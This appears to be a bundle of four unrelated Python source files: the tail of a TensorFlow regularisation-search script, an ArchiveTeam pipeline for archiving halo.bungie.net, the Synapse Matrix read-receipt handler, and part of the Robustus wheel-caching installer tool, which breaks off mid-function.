weights4 = tf.get_variable('weights4', [h3_length, h4_length], initializer=tf.contrib.layers.xavier_initializer())
biases4 = tf.Variable(tf.zeros([h4_length]))
logits4 = tf.nn.dropout(x=tf.nn.relu(tf.matmul(logits3, weights4) + biases4), keep_prob=keep_prob)
weights5 = tf.get_variable('weights5', [h4_length, h5_length], initializer=tf.contrib.layers.xavier_initializer())
biases5 = tf.Variable(tf.zeros([h5_length]))
logits5 = tf.nn.dropout(x=tf.nn.relu(tf.matmul(logits4, weights5) + biases5), keep_prob=keep_prob)
weights6 = tf.get_variable('weights6', [h5_length, num_labels], initializer=tf.contrib.layers.xavier_initializer())
biases6 = tf.Variable(tf.zeros([num_labels]))
logits6 = tf.matmul(logits5, weights6) + biases6
loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits6, tf_train_labels)
+ regular_lambda1*tf.nn.l2_loss(weights1)
+ regular_lambda2*tf.nn.l2_loss(weights2)
+ regular_lambda3*tf.nn.l2_loss(weights3)
+ regular_lambda4*tf.nn.l2_loss(weights4)
+ regular_lambda5 * tf.nn.l2_loss(weights5)
+ regular_lambda6 * tf.nn.l2_loss(weights6))
optimizer = tf.train.GradientDescentOptimizer(learning_rate).minimize(loss,global_step=global_step)
train_prediction = tf.nn.softmax(logits6)
valid_prediction = tf.nn.softmax(
tf.matmul(
tf.nn.relu(tf.matmul(
tf.nn.relu(tf.matmul(
tf.nn.relu(tf.matmul(
tf.nn.relu(tf.matmul(
tf.nn.relu(tf.matmul(tf_valid_dataset, weights1) + biases1)
, weights2) + biases2)
, weights3) + biases3)
, weights4) + biases4)
, weights5) + biases5)
, weights6) + biases6
)
test_prediction = tf.nn.softmax(
tf.matmul(
tf.nn.relu(tf.matmul(
tf.nn.relu(tf.matmul(
tf.nn.relu(tf.matmul(
tf.nn.relu(tf.matmul(
tf.nn.relu(tf.matmul(tf_test_dataset, weights1) + biases1)
, weights2) + biases2)
, weights3) + biases3)
, weights4) + biases4)
, weights5) + biases5)
, weights6) + biases6
)
def accuracy(predictions, labels):
return 100.0 * np.sum(np.argmax(predictions, 1) == np.argmax(labels, 1)) / predictions.shape[0]
with tf.Session(graph=graph) as session:
tf.global_variables_initializer().run()
for step in range(num_steps):
offset = batch_size*step % (train_labels.shape[0]-batch_size)
batch_data = train_dataset[offset:(offset+batch_size),:]
batch_labels = train_labels[offset:(offset+batch_size),:]
feed_dict = {tf_train_dataset: batch_data, tf_train_labels: batch_labels, keep_prob: 1}
# feed_dict = {tf_train_dataset: batch_data, tf_train_labels: batch_labels, keep_prob: 0.5}
_, l, predictions = session.run([optimizer, loss, train_prediction], feed_dict=feed_dict)
if step % 500 == 0:
print("Minibatch loss at step %d: %f" % (step, l))
print("Minibatch accuracy: %.1f%%" % accuracy(predictions, batch_labels))
print("Validation accuracy: %.1f%%" % accuracy(
valid_prediction.eval(), valid_labels))
testing_accuracy = accuracy(test_prediction.eval(), test_labels)
print('Testing accuracy: %.1f%%' % accuracy(test_prediction.eval(), test_labels))
best_hyper[str(testing_accuracy)] = (regular_lambda1, regular_lambda2, regular_lambda3, regular_lambda4, regular_lambda5, regular_lambda6)
print('\nresults:\n', best_hyper)
|
|
# encoding=utf8
import datetime
from distutils.version import StrictVersion
import hashlib
import os.path
import random
from seesaw.config import realize, NumberConfigValue
from seesaw.item import ItemInterpolation, ItemValue
from seesaw.task import SimpleTask, LimitConcurrent
from seesaw.tracker import GetItemFromTracker, PrepareStatsForTracker, \
UploadWithTracker, SendDoneToTracker
import shutil
import socket
import subprocess
import sys
import time
import string
import seesaw
from seesaw.externalprocess import WgetDownload
from seesaw.pipeline import Pipeline
from seesaw.project import Project
from seesaw.util import find_executable
# check the seesaw version
if StrictVersion(seesaw.__version__) < StrictVersion("0.1.5"):
raise Exception("This pipeline needs seesaw version 0.1.5 or higher.")
###########################################################################
# Find a useful Wget+Lua executable.
#
# WGET_LUA will be set to the first path that
# 1. does not crash with --version, and
# 2. prints the required version string
WGET_LUA = find_executable(
"Wget+Lua",
["GNU Wget 1.14.lua.20130523-9a5c"],
[
"./wget-lua",
"./wget-lua-warrior",
"./wget-lua-local",
"../wget-lua",
"../../wget-lua",
"/home/warrior/wget-lua",
"/usr/bin/wget-lua"
]
)
if not WGET_LUA:
raise Exception("No usable Wget+Lua found.")
###########################################################################
# The version number of this pipeline definition.
#
# Update this each time you make a non-cosmetic change.
# It will be added to the WARC files and reported to the tracker.
VERSION = "20141106.05"
USER_AGENT = 'ArchiveTeam'
TRACKER_ID = 'halo'
TRACKER_HOST = 'tracker.archiveteam.org'
###########################################################################
# This section defines project-specific tasks.
#
# Simple tasks (tasks that do not need any concurrency) are based on the
# SimpleTask class and have a process(item) method that is called for
# each item.
class CheckIP(SimpleTask):
def __init__(self):
SimpleTask.__init__(self, "CheckIP")
self._counter = 0
def process(self, item):
# NEW for 2014! Check if we are behind firewall/proxy
if self._counter <= 0:
item.log_output('Checking IP address.')
ip_set = set()
ip_set.add(socket.gethostbyname('twitter.com'))
ip_set.add(socket.gethostbyname('facebook.com'))
ip_set.add(socket.gethostbyname('youtube.com'))
ip_set.add(socket.gethostbyname('microsoft.com'))
ip_set.add(socket.gethostbyname('icanhas.cheezburger.com'))
ip_set.add(socket.gethostbyname('archiveteam.org'))
if len(ip_set) != 6:
item.log_output('Got IP addresses: {0}'.format(ip_set))
item.log_output(
'Are you behind a firewall/proxy? That is a big no-no!')
raise Exception(
'Are you behind a firewall/proxy? That is a big no-no!')
# Check only occasionally
if self._counter <= 0:
self._counter = 10
else:
self._counter -= 1
class PrepareDirectories(SimpleTask):
def __init__(self, warc_prefix):
SimpleTask.__init__(self, "PrepareDirectories")
self.warc_prefix = warc_prefix
def process(self, item):
item_name = item["item_name"]
escaped_item_name = item_name.replace(':', '_').replace('/', '_').replace('~', '_')
dirname = "/".join((item["data_dir"], escaped_item_name))
if os.path.isdir(dirname):
shutil.rmtree(dirname)
os.makedirs(dirname)
item["item_dir"] = dirname
item["warc_file_base"] = "%s-%s-%s" % (self.warc_prefix, escaped_item_name,
time.strftime("%Y%m%d-%H%M%S"))
open("%(item_dir)s/%(warc_file_base)s.warc.gz" % item, "w").close()
class MoveFiles(SimpleTask):
def __init__(self):
SimpleTask.__init__(self, "MoveFiles")
def process(self, item):
# NEW for 2014! Check if wget was compiled with zlib support
if os.path.exists("%(item_dir)s/%(warc_file_base)s.warc" % item):
raise Exception('Please compile wget with zlib support!')
os.rename("%(item_dir)s/%(warc_file_base)s.warc.gz" % item,
"%(data_dir)s/%(warc_file_base)s.warc.gz" % item)
shutil.rmtree("%(item_dir)s" % item)
def get_hash(filename):
with open(filename, 'rb') as in_file:
return hashlib.sha1(in_file.read()).hexdigest()
CWD = os.getcwd()
PIPELINE_SHA1 = get_hash(os.path.join(CWD, 'pipeline.py'))
LUA_SHA1 = get_hash(os.path.join(CWD, 'halo.lua'))
def stats_id_function(item):
# NEW for 2014! Some accountability hashes and stats.
d = {
'pipeline_hash': PIPELINE_SHA1,
'lua_hash': LUA_SHA1,
'python_version': sys.version,
}
return d
class WgetArgs(object):
def realize(self, item):
wget_args = [
WGET_LUA,
"-U", USER_AGENT,
"-nv",
"--lua-script", "halo.lua",
"-o", ItemInterpolation("%(item_dir)s/wget.log"),
"--no-check-certificate",
"--output-document", ItemInterpolation("%(item_dir)s/wget.tmp"),
"--truncate-output",
"-e", "robots=off",
"--rotate-dns",
"--recursive", "--level=inf",
"--no-parent",
"--page-requisites",
"--timeout", "30",
"--tries", "inf",
"--domains", "halo.bungie.net",
"--span-hosts",
"--waitretry", "30",
"--warc-file", ItemInterpolation("%(item_dir)s/%(warc_file_base)s"),
"--warc-header", "operator: Archive Team",
"--warc-header", "halo-dld-script-version: " + VERSION,
"--warc-header", ItemInterpolation("halo-user: %(item_name)s"),
]
item_name = item['item_name']
assert ':' in item_name
item_type, item_value = item_name.split(':', 1)
item['item_type'] = item_type
item['item_value'] = item_value
assert item_type in ("halo3file")
if item_type == 'halo3file':
suffixesa = string.digits
suffixesb = string.digits
for url in ['http://halo.bungie.net/Online/Halo3UserContentDetails.aspx?h3fileid={0}{1}{2}'.format(item_value, a, b) for a in suffixesa for b in suffixesb]:
wget_args.append(url)
else:
raise Exception('Unknown item')
if 'bind_address' in globals():
wget_args.extend(['--bind-address', globals()['bind_address']])
print('')
print('*** Wget will bind address at {0} ***'.format(
globals()['bind_address']))
print('')
return realize(wget_args, item)
###########################################################################
# Initialize the project.
#
# This will be shown in the warrior management panel. The logo should not
# be too big. The deadline is optional.
project = Project(
title="halo",
project_html="""
<img class="project-logo" alt="Project logo" src="http://gamerfreunde.net/wp-content/uploads/2014/02/NewHaloLogo.png" height="50px" title=""/>
<h2>halo.bungie.net <span class="links"><a href="http://halo.bungie.net/">Website</a> · <a href="http://tracker.archiveteam.org/halo/">Leaderboard</a></span></h2>
<p>Archiving old stats and other data from Halo.</p>
"""
)
pipeline = Pipeline(
CheckIP(),
GetItemFromTracker("http://%s/%s" % (TRACKER_HOST, TRACKER_ID), downloader,
VERSION),
PrepareDirectories(warc_prefix="halo"),
WgetDownload(
WgetArgs(),
max_tries=2,
accept_on_exit_code=[0, 8],
env={
"item_dir": ItemValue("item_dir"),
"item_value": ItemValue("item_value"),
"item_type": ItemValue("item_type"),
}
),
PrepareStatsForTracker(
defaults={"downloader": downloader, "version": VERSION},
file_groups={
"data": [
ItemInterpolation("%(item_dir)s/%(warc_file_base)s.warc.gz")
]
},
id_function=stats_id_function,
),
MoveFiles(),
LimitConcurrent(NumberConfigValue(min=1, max=4, default="1",
name="shared:rsync_threads", title="Rsync threads",
description="The maximum number of concurrent uploads."),
UploadWithTracker(
"http://%s/%s" % (TRACKER_HOST, TRACKER_ID),
downloader=downloader,
version=VERSION,
files=[
ItemInterpolation("%(data_dir)s/%(warc_file_base)s.warc.gz")
],
rsync_target_source_path=ItemInterpolation("%(data_dir)s/"),
rsync_extra_args=[
"--recursive",
"--partial",
"--partial-dir", ".rsync-tmp",
]
),
),
SendDoneToTracker(
tracker_url="http://%s/%s" % (TRACKER_HOST, TRACKER_ID),
stats=ItemValue("stats")
)
)
|
|
# Copyright 2015, 2016 OpenMarket Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from typing import TYPE_CHECKING, Iterable, List, Optional, Tuple
from synapse.api.constants import ReadReceiptEventFields, ReceiptTypes
from synapse.appservice import ApplicationService
from synapse.streams import EventSource
from synapse.types import JsonDict, ReadReceipt, UserID, get_domain_from_id
if TYPE_CHECKING:
from synapse.server import HomeServer
logger = logging.getLogger(__name__)
class ReceiptsHandler:
def __init__(self, hs: "HomeServer"):
self.notifier = hs.get_notifier()
self.server_name = hs.config.server.server_name
self.store = hs.get_datastores().main
self.event_auth_handler = hs.get_event_auth_handler()
self.hs = hs
# We only need to poke the federation sender explicitly if its on the
# same instance. Other federation sender instances will get notified by
# `synapse.app.generic_worker.FederationSenderHandler` when it sees it
# in the receipts stream.
self.federation_sender = None
if hs.should_send_federation():
self.federation_sender = hs.get_federation_sender()
# If we can handle the receipt EDUs we do so, otherwise we route them
# to the appropriate worker.
if hs.get_instance_name() in hs.config.worker.writers.receipts:
hs.get_federation_registry().register_edu_handler(
"m.receipt", self._received_remote_receipt
)
else:
hs.get_federation_registry().register_instances_for_edu(
"m.receipt",
hs.config.worker.writers.receipts,
)
self.clock = self.hs.get_clock()
self.state = hs.get_state_handler()
async def _received_remote_receipt(self, origin: str, content: JsonDict) -> None:
"""Called when we receive an EDU of type m.receipt from a remote HS."""
receipts = []
for room_id, room_values in content.items():
# If we're not in the room just ditch the event entirely. This is
# probably an old server that has come back and thinks we're still in
# the room (or we've been rejoined to the room by a state reset).
is_in_room = await self.event_auth_handler.check_host_in_room(
room_id, self.server_name
)
if not is_in_room:
logger.info(
"Ignoring receipt for room %r from server %s as we're not in the room",
room_id,
origin,
)
continue
for receipt_type, users in room_values.items():
for user_id, user_values in users.items():
if get_domain_from_id(user_id) != origin:
logger.info(
"Received receipt for user %r from server %s, ignoring",
user_id,
origin,
)
continue
receipts.append(
ReadReceipt(
room_id=room_id,
receipt_type=receipt_type,
user_id=user_id,
event_ids=user_values["event_ids"],
data=user_values.get("data", {}),
)
)
await self._handle_new_receipts(receipts)
async def _handle_new_receipts(self, receipts: List[ReadReceipt]) -> bool:
"""Takes a list of receipts, stores them and informs the notifier."""
min_batch_id: Optional[int] = None
max_batch_id: Optional[int] = None
for receipt in receipts:
res = await self.store.insert_receipt(
receipt.room_id,
receipt.receipt_type,
receipt.user_id,
receipt.event_ids,
receipt.data,
)
if not res:
# res will be None if this read receipt is 'old'
continue
stream_id, max_persisted_id = res
if min_batch_id is None or stream_id < min_batch_id:
min_batch_id = stream_id
if max_batch_id is None or max_persisted_id > max_batch_id:
max_batch_id = max_persisted_id
# Either both of these should be None or neither.
if min_batch_id is None or max_batch_id is None:
# no new receipts
return False
affected_room_ids = list({r.room_id for r in receipts})
self.notifier.on_new_event("receipt_key", max_batch_id, rooms=affected_room_ids)
# Note that the min here shouldn't be relied upon to be accurate.
await self.hs.get_pusherpool().on_new_receipts(
min_batch_id, max_batch_id, affected_room_ids
)
return True
async def received_client_receipt(
self, room_id: str, receipt_type: str, user_id: str, event_id: str, hidden: bool
) -> None:
"""Called when a client tells us a local user has read up to the given
event_id in the room.
"""
receipt = ReadReceipt(
room_id=room_id,
receipt_type=receipt_type,
user_id=user_id,
event_ids=[event_id],
data={"ts": int(self.clock.time_msec()), "hidden": hidden},
)
is_new = await self._handle_new_receipts([receipt])
if not is_new:
return
if self.federation_sender and not (
self.hs.config.experimental.msc2285_enabled and hidden
):
await self.federation_sender.send_read_receipt(receipt)
class ReceiptEventSource(EventSource[int, JsonDict]):
def __init__(self, hs: "HomeServer"):
self.store = hs.get_datastores().main
self.config = hs.config
@staticmethod
def filter_out_hidden(events: List[JsonDict], user_id: str) -> List[JsonDict]:
visible_events = []
# filter out hidden receipts the user shouldn't see
for event in events:
content = event.get("content", {})
new_event = event.copy()
new_event["content"] = {}
for event_id in content.keys():
event_content = content.get(event_id, {})
m_read = event_content.get(ReceiptTypes.READ, {})
# If m_read is missing copy over the original event_content as there is nothing to process here
if not m_read:
new_event["content"][event_id] = event_content.copy()
continue
new_users = {}
for rr_user_id, user_rr in m_read.items():
try:
hidden = user_rr.get("hidden")
except AttributeError:
# Due to https://github.com/matrix-org/synapse/issues/10376
# there are cases where user_rr is a string, in those cases
# we just ignore the read receipt
continue
if hidden is not True or rr_user_id == user_id:
new_users[rr_user_id] = user_rr.copy()
# If hidden has a value replace hidden with the correct prefixed key
if hidden is not None:
new_users[rr_user_id].pop("hidden")
new_users[rr_user_id][
ReadReceiptEventFields.MSC2285_HIDDEN
] = hidden
# Set new users unless empty
if len(new_users.keys()) > 0:
new_event["content"][event_id] = {ReceiptTypes.READ: new_users}
# Append new_event to visible_events unless empty
if len(new_event["content"].keys()) > 0:
visible_events.append(new_event)
return visible_events
async def get_new_events(
self,
user: UserID,
from_key: int,
limit: Optional[int],
room_ids: Iterable[str],
is_guest: bool,
explicit_room_id: Optional[str] = None,
) -> Tuple[List[JsonDict], int]:
from_key = int(from_key)
to_key = self.get_current_key()
if from_key == to_key:
return [], to_key
events = await self.store.get_linearized_receipts_for_rooms(
room_ids, from_key=from_key, to_key=to_key
)
if self.config.experimental.msc2285_enabled:
events = ReceiptEventSource.filter_out_hidden(events, user.to_string())
return events, to_key
async def get_new_events_as(
self, from_key: int, service: ApplicationService
) -> Tuple[List[JsonDict], int]:
"""Returns a set of new read receipt events that an appservice
may be interested in.
Args:
from_key: the stream position at which events should be fetched from
service: The appservice which may be interested
Returns:
A two-tuple containing the following:
* A list of json dictionaries derived from read receipts that the
appservice may be interested in.
* The current read receipt stream token.
"""
from_key = int(from_key)
to_key = self.get_current_key()
if from_key == to_key:
return [], to_key
# Fetch all read receipts for all rooms, up to a limit of 100. This is ordered
# by most recent.
rooms_to_events = await self.store.get_linearized_receipts_for_all_rooms(
from_key=from_key, to_key=to_key
)
# Then filter down to rooms that the AS can read
events = []
for room_id, event in rooms_to_events.items():
if not await service.is_interested_in_room(room_id, self.store):
continue
events.append(event)
return events, to_key
def get_current_key(self, direction: str = "f") -> int:
return self.store.get_max_receipt_stream_id()
|
|
# =============================================================================
# COPYRIGHT 2013-14 Brain Corporation.
# License under MIT license (see LICENSE file)
# =============================================================================
import argparse
import collections
import distutils.core
import fnmatch
import glob
import importlib
import logging
import multiprocessing
import os
import platform
import shutil
import subprocess
import sys
import tempfile
from detail import Requirement, RequirementException, read_requirement_file
from detail.requirement import remove_duplicate_requirements, expand_requirements_specifiers, generate_dependency_list
from detail.utility import ln, run_shell, download, safe_remove, unpack, get_single_char
import urllib2
# for doctests
import detail
import re
__version__ = '0.0.2'
class RobustusException(Exception):
def __init__(self, message):
Exception.__init__(self, message)
class Robustus(object):
settings_file_path = '.robustus'
cached_requirements_file_path = 'cached_requirements.txt'
default_settings = {
'cache': 'wheelhouse'
}
# FIXME: not so great to hardcode braincorp address here, but in other way
# we need to modify other repositories use_repo.sh which use robustus
default_package_locations = ['http://thirdparty-packages.braincorporation.net']
def __init__(self, args):
"""
Initialize robustus tool. Should be called if sys.executable is in robustus environment
@param: args - command line arguments
"""
if args.env is not None:
self.env = os.path.abspath(args.env)
else:
self.env = os.path.abspath(os.path.join(sys.executable, os.pardir, os.pardir))
# check if we are in robustus environment
self.settings_file_path = os.path.join(self.env, Robustus.settings_file_path)
if not os.path.isfile(self.settings_file_path):
raise RobustusException('bad robustus environment ' + self.env + ': .robustus settings file not found')
settings = eval(open(self.settings_file_path).read())
self.settings = Robustus._override_settings(settings, args)
if 'find_links' not in self.settings:
self.settings['find_links'] = self.default_package_locations
logging.info('Robustus will use the following cache folder: %s' % self.settings['cache'])
self.python_executable = os.path.join(self.env, 'bin/python')
if not os.path.isfile(self.python_executable):
self.python_executable = os.path.join(self.env, 'bin/python27')
if not os.path.isfile(self.python_executable):
raise RobustusException('bad robustus environment ' + self.env + ': python not found')
self.pip_executable = os.path.join(self.env, 'bin/pip')
if not os.path.isfile(self.pip_executable):
raise RobustusException('bad robustus environment ' + self.env + ': pip not found')
self.easy_install_executable = os.path.join(self.env, 'bin/easy_install')
if not os.path.isfile(self.easy_install_executable):
raise RobustusException('bad robustus environment ' + self.env + ': easy_install not found')
# make cached packages directory if necessary
self.cache = os.path.join(self.env, self.settings['cache'])
if not os.path.isdir(self.cache):
os.mkdir(self.cache)
# remove bad formatted rob files with '.' in version instead of '_'
for rob_file in glob.iglob('%s/*.rob' % self.cache):
rob_basename = os.path.basename(rob_file)
if rob_basename.find('__') != -1:
name, version = rob_basename[:-4].split('__')
if '.' in version:
corrected_filename = os.path.join(self.cache,
'%s__%s.rob' % (name, version.replace('.', '_')))
logging.info('Corrected rob file version from %s to %s' % (rob_file, corrected_filename))
shutil.copy(rob_file, corrected_filename)
os.remove(rob_file)
# read cached packages
self.cached_packages = []
for rob_file in glob.iglob('%s/*.rob' % self.cache):
self.cached_packages.append(Requirement(rob_filename=rob_file))
@staticmethod
def _override_settings(settings, args):
# override settings with command line arguments
if args.cache is not None:
settings['cache'] = args.cache
settings['verbosity'] = args.verbosity
settings['debug'] = args.debug
# Set logging volume for debugging
if settings['debug']:
logging.getLogger('').setLevel(logging.DEBUG)
return settings
@staticmethod
def env(args):
"""
Create robustus environment.
@param args: command line arguments
"""
settings = dict()
settings = Robustus._override_settings(settings, args)
# create virtualenv
python_executable = os.path.abspath(os.path.join(args.env, 'bin/python'))
if os.path.isfile(python_executable):
logging.info('Found virtualenv in ' + args.env)
else:
logging.info('Creating virtualenv')
virtualenv_args = ['virtualenv', args.env, '--prompt', args.prompt]
if args.python is not None:
virtualenv_args += ['--python', args.python]
if args.system_site_packages:
virtualenv_args += ['--system-site-packages']
run_shell(virtualenv_args, settings['verbosity'] >= 1)
pip_executable = os.path.abspath(os.path.join(args.env, 'bin/pip'))
if not os.path.isfile(pip_executable):
raise RobustusException('failed to create virtualenv, pip not found')
easy_install_executable = os.path.abspath(os.path.join(args.env, 'bin/easy_install'))
if not os.path.isfile(easy_install_executable):
raise RobustusException('failed to create virtualenv, easy_install not found')
# http://wheel.readthedocs.org/en/latest/
# wheel is binary packager for python/pip
# we store all packages in binary wheel somewhere on the PC to avoid recompilation of packages
# wheel needs pip>=1.4, setuptools>=0.8 and wheel packages for wheeling
run_shell([pip_executable, 'install', 'pip==6.1.1', '--upgrade'], settings['verbosity'] >= 1)
run_shell([pip_executable, 'install', 'wheel==0.24.0', '--upgrade'], settings['verbosity'] >= 1)
# some sloppy maintained packages (like ROS) require outdated distribute for installation
# and we need to install it before setuptools. For those there used to be the following lines here:
# run_shell([pip_executable, 'install', 'distribute==0.7.3'], settings['verbosity'] >= 1)
# run_shell([pip_executable, 'install', 'setuptools==1.1.6', '--upgrade'], settings['verbosity'] >= 1)
# that are gone now, but please consider uncommenting those if new problems with ROS appear.
# Currently we upgrade setuptools to the moder version:
run_shell([pip_executable, 'install', 'setuptools==15.2', '--upgrade'], settings['verbosity'] >= 1)
# linking BLAS and LAPACK libraries
if os.path.isfile('/usr/lib64/libblas.so.3'):
logging.info('Linking CentOS libblas to venv')
blas_so = os.path.join(args.env, 'lib64/libblas.so')
ln('/usr/lib64/libblas.so.3', blas_so, True)
os.environ['BLAS'] = os.path.join(args.env, 'lib64')
elif os.path.isfile('/usr/lib/libblas.so'):
logging.info('Linking Ubuntu libblas to venv')
blas_so = os.path.join(args.env, 'lib/libblas.so')
ln('/usr/lib/libblas.so', blas_so, True)
os.environ['BLAS'] = os.path.join(args.env, 'lib')
if os.path.isfile('/usr/lib64/liblapack.so.3'):
logging.info('Linking CentOS liblapack to venv')
lapack_so = os.path.join(args.env, 'lib64/liblapack.so')
ln('/usr/lib64/liblapack.so.3', lapack_so, True)
os.environ['LAPACK'] = os.path.join(args.env, 'lib64')
elif os.path.isfile('/usr/lib/liblapack.so'):
logging.info('Linking Ubuntu liblapack to venv')
lapack_so = os.path.join(args.env, 'lib/liblapack.so')
ln('/usr/lib/liblapack.so', lapack_so, True)
os.environ['LAPACK'] = os.path.join(args.env, 'lib')
if sys.platform.startswith('darwin'):
# on Mac, install readline before everything else
# Ubuntu already has readline in the system python library
run_shell([easy_install_executable, '-q', 'readline==6.2.2'], settings['verbosity'] >= 1)
# compose settings file
logging.info('Write .robustus config file')
settings = Robustus._override_settings(Robustus.default_settings, args)
with open(os.path.join(args.env, Robustus.settings_file_path), 'w') as file:
file.write(str(settings))
# Install Robustus in the Python virtual environment if its "setup.py" is available.
# If Robustus has already been installed in the virtual environment, running "setup.py"
# should be harmless. This is required to pass the "test_robustus" test.
cwd = os.getcwd()
script_dir = os.path.dirname(os.path.realpath(__file__))
setup_dir = os.path.abspath(os.path.join(script_dir, os.path.pardir))
logging.info('python_executable = %s' % python_executable)
logging.info('script_dir = %s' % script_dir)
logging.info('setup_dir = %s' % setup_dir)
os.chdir(setup_dir)
if os.path.exists('setup.py'):
run_shell([python_executable, 'setup.py', 'install'], settings['verbosity'] >= 1)
else:
logging.warn('Cannot find setup.py in %s. Continuing...' % setup_dir)
os.chdir(cwd)
logging.info('Robustus initialized environment with cache located at %s' % settings['cache'])
def install_satisfactory_requirement_from_remote(self, requirement_specifier):
"""
If wheel for satisfactory requirement found on remote, install it.
:param requirement_specifier: specifies package namd and package version string
:return: True if package installed by function (according to pip return code);
False otherwise.
"""
logging.info('Attempting to install package from remote wheel')
for find_link in self.settings['find_links']:
find_links_url = find_link + '/python-wheels/index.html', # TEMPORARY.
dtemp_path = tempfile.mkdtemp()
return_code = run_shell([self.pip_executable,
'install',
'--download-cache=%s' % dtemp_path,
'--no-index',
'--use-wheel',
'--find-links=%s' % find_links_url,
'--trusted-host=%s' % find_link.split("http://")[1],
requirement_specifier.freeze()],
verbose=self.settings['verbosity'] >= 2)
if return_code == 0:
# The following downloads the wheels of the requirment (and those of
# dependencies) into a pip download cache and moves (renames) the downloaded
# wheels into the local Robustus cache. Regarding the need for this see "Wheels
# for Dependencies" "http://lucumr.pocoo.org/2014/1/27/python-on-wheels/".
for file_path in glob.glob(os.path.join(dtemp_path, 'http*.whl')):
if os.path.isfile(file_path):
file_name = os.path.basename(file_path)
file_name_new = file_name.rpartition('%2F')[-1]
file_path_new = os.path.join(self.cache, file_name_new)
shutil.move(file_path, file_path_new) # NOTE: Allow overwrites.
safe_remove(dtemp_path)
return True
else:
logging.info('pip failed to install requirement %s from remote wheels cache %s.'
% (requirement_specifier.freeze(), find_links_url))
safe_remove(dtemp_path)
return False
def install_through_wheeling(self, requirement_specifier, rob_file, ignore_index):
"""
Check if package cache already contains package of specified version, if so install it.
Otherwise make a wheel and put it into cache.
Hope manual check for requirements file won't be necessary, waiting for pip 1.5 https://github.com/pypa/pip/issues/855
:param package: package name
:param version: package version string
:return: None
"""
# If wheelhouse doesn't contain necessary requirement attempt to install from remote wheel archive or make a wheel.
installed = False
if self.find_satisfactory_requirement(requirement_specifier) is None:
# Pip does not download the wheels of dependencies unless it installs.
installed = False
if not self.settings['no_remote_cache']:
installed = self.install_satisfactory_requirement_from_remote(requirement_specifier)
if not installed:
logging.info('Wheel not found, downloading package')
cmd = [self.pip_executable, 'install']
if len(self.settings['allow_external']) > 0:
cmd += ['--allow-external'] + self.settings['allow_external']
if self.settings['allow_all_external']:
cmd.append('--allow-all-external')
if len(self.settings['allow_unverified']) > 0:
cmd += ['--allow-unverified'] + self.settings['allow_unverified']
cmd += ['--download', self.cache, requirement_specifier.freeze()]
return_code = run_shell(cmd, verbose=self.settings['verbosity'] >= 2)
if return_code != 0:
raise RequirementException('pip failed to download requirement %s' % requirement_specifier.freeze())
logging.info('Done')
logging.info('Building wheel')
wheel_cmd = [self.pip_executable,
'wheel',
'--no-index',
'--find-links=%s' % self.cache,
'--wheel-dir=%s' % self.cache,
requirement_specifier.freeze()]
# we probably sometimes will want to see build log
for i in xrange(self.settings['verbosity']):
wheel_cmd.append('-v')
return_code = run_shell(wheel_cmd, verbose=self.settings['verbosity'] >= 1)
if return_code != 0:
raise RequirementException('pip failed to build wheel for requirement %s'
% requirement_specifier.freeze())
logging.info('Done')
if not installed:
# install from new prebuilt wheel
logging.info('Installing package from wheel')
return_code = run_shell([self.pip_executable,
'install',
'--no-index',
'--use-wheel',
'--find-links=%s' % self.cache,
requirement_specifier.freeze()],
verbose=self.settings['verbosity'] >= 2)
if return_code != 0:
raise RequirementException('pip failed to install requirement %s from wheels cache %s.'
% (requirement_specifier.freeze(), self.cache))
def _pip_install_requirement(self, requirement_specifier):
command = ' '.join([self.pip_executable, 'install', requirement_specifier.freeze()])
logging.info('Got url-based requirement. '
'Fall back to pip shell command:%s' % (command,))
ret_code = run_shell(command, shell=True, verbose=self.settings['verbosity'] >= 1)
return ret_code
def install_requirement(self, requirement_specifier, ignore_index, tag):
attempts = self.settings['attempts']
logging.info('='*30) # Nicely separate installation of different packages in console output
for a in range(attempts):
result = self._install_requirement_attempt(requirement_specifier, ignore_index, tag, a)
if result:
return
def _install_requirement_attempt(self, requirement_specifier, ignore_index, tag, attempt_number):
if attempt_number == 0:
logging.info('Installing %s' % (requirement_specifier.freeze(),))
else:
logging.info('Installing %s (attempt %d)' % (requirement_specifier.freeze(), attempt_number + 1))
if tag:
logging.info('with tag %s, ignore_missing_refs %s' % (tag,
self.settings['ignore_missing_refs']))
if requirement_specifier.url is not None or requirement_specifier.path is not None:
# install reqularly using pip
if not self.settings['update_editables'] and \
requirement_specifier.url is not None and \
requirement_specifier.editable:
editable_requirement_path = os.path.join(self.env, 'src', requirement_specifier.name)
logging.info('Got url-based requirement. Checking if exists %s ' % (editable_requirement_path,))
if tag is None and os.path.exists(editable_requirement_path):
logging.info('For safety reasons robustus will not proceed with requirement %s, '
'because directories for installing this package already exists (%s). '
'To update editable dependency, please remove folder and run again.' %
(requirement_specifier.freeze(),
os.path.join(self.env, 'src', requirement_specifier.name)))
return False
# here we have to run via shell because requirement can be editable and then it will require
# extra parsing to extract -e flag into separate argument.
if tag and requirement_specifier.editable and requirement_specifier.path is None:
logging.info('Overriding editable branch with tag %s' % tag)
original_url = requirement_specifier.url
requirement_specifier.override_branch(tag)
ret_code = self._pip_install_requirement(requirement_specifier)
# special case for path-based requirements - we need to call 'git checkout'
if ret_code == 0 and tag and requirement_specifier.editable and requirement_specifier.path is not None:
cwd = os.getcwd()
os.chdir(requirement_specifier.path)
logging.info('Checking out editable branch in directory "%s" with tag %s' % (requirement_specifier.path, tag))
# Check if branch exists locally - should never be the case on Travis.
if not subprocess.check_output('git branch --list %s' % tag, shell=True):
'''
If the branch doesn't exist locally, we fetch it.
Note: it may seem more natural to do:
git checkout -b {branch} origin/{branch}
but that produces a git error:
fatal: git checkout: updating paths is incompatible with switching branches.
Did you intend to checkout 'origin/{branch}' which can not be resolved as commit?
See http://stackoverflow.com/questions/945654/git-checkout-on-a-remote-branch-does-not-work
'''
os.system('git fetch origin {0}:{0}'.format(tag))
local_checkout_code = os.system('git checkout {0}'.format(tag))
os.chdir(cwd)
if local_checkout_code!=0:
if self.settings['ignore_missing_refs']:
logging.info('Tag or branch doesnt exist for this package, using default')
else:
return False
if ret_code != 0 and tag and self.settings['ignore_missing_refs']:
logging.info('Tag or branch doesnt exist for this package, using default')
requirement_specifier.url = original_url
ret_code = self._pip_install_requirement(requirement_specifier)
if ret_code != 0:
